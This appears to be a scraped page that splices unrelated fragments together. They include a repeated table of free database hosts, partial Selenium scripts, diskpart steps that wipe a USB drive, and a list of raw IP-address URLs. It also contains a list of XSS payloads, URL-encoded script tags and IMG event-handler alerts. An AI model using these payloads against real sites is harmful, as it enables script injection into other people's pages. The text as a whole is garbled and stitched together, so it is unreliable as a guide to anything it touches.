See also:
| Service | Type | Storage | Limitations |
|---|---|---|---|
| Amazon DynamoDB | 25 GB | ||
| Amazon RDS | |||
| Azure SQL Database | MS SQL Server | ||
| 👉 Clever Cloud | PostgreSQL, MySQL, MongoDB, Redis | 256 MB (PostgreSQL) | Max 5 connections (PostgreSQL) |
| from selenium import webdriver | |
| from selenium.webdriver.common.by import By | |
| from selenium.webdriver.support.ui import Select, WebDriverWait | |
| from selenium.webdriver.support import expected_conditions as EC | |
| from time import sleep, strftime | |
| def waituntil(s): | |
| while strftime('%H:%M:%S') < s: | |
| print strftime('%H:%M:%S') | |
| sleep(1) |
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
See also:
| Service | Type | Storage | Limitations |
|---|---|---|---|
| Amazon DynamoDB | 25 GB | ||
| Amazon RDS | |||
| Azure SQL Database | MS SQL Server | ||
| 👉 Clever Cloud | PostgreSQL, MySQL, MongoDB, Redis | 256 MB (PostgreSQL) | Max 5 connections (PostgreSQL) |
How to fix a USB drive showing up as two drives (fragmented into multiple partitions) on Windows:
diskpart to enter the disk partition tool.list disk to see all disks listed.select disk [NUMBER]. Be careful to select the correct drive.clean. An error will occur if you have the drive folder open, close the window and repeat the command if this happens.create partition primary.format fs=ntfs quick to format the drive (you can also choose to set fs=fat32).active.| http://wla.1-s.es/ | |
| http://24.22.106.166:7777/mobile | |
| http://91.121.121.15/ | |
| http://190.151.12.194/software/documentacion/ebooks/ | |
| http://79.127.126.110/Movie/ | |
| http://79.127.127.112 | |
| http://32.209.140.181/sandbox/musicbox/music/ | |
| http://130.185.144.63/ | |
| http://103.91.144.230/ftpdata/ | |
| http://77.175.148.98:8081/mobile |
| from selenium import webdriver | |
| from selenium.webdriver.support import expected_conditions as EC | |
| import time | |
| from selenium.webdriver.common.keys import Keys | |
| from selenium.webdriver.common.by import By | |
| from selenium.webdriver.support.ui import WebDriverWait | |
| from selenium.webdriver.common.action_chains import ActionChains | |
| from selenium.webdriver.support.select import Select | |
| from selenium.webdriver.chrome.options import Options | |
| import os |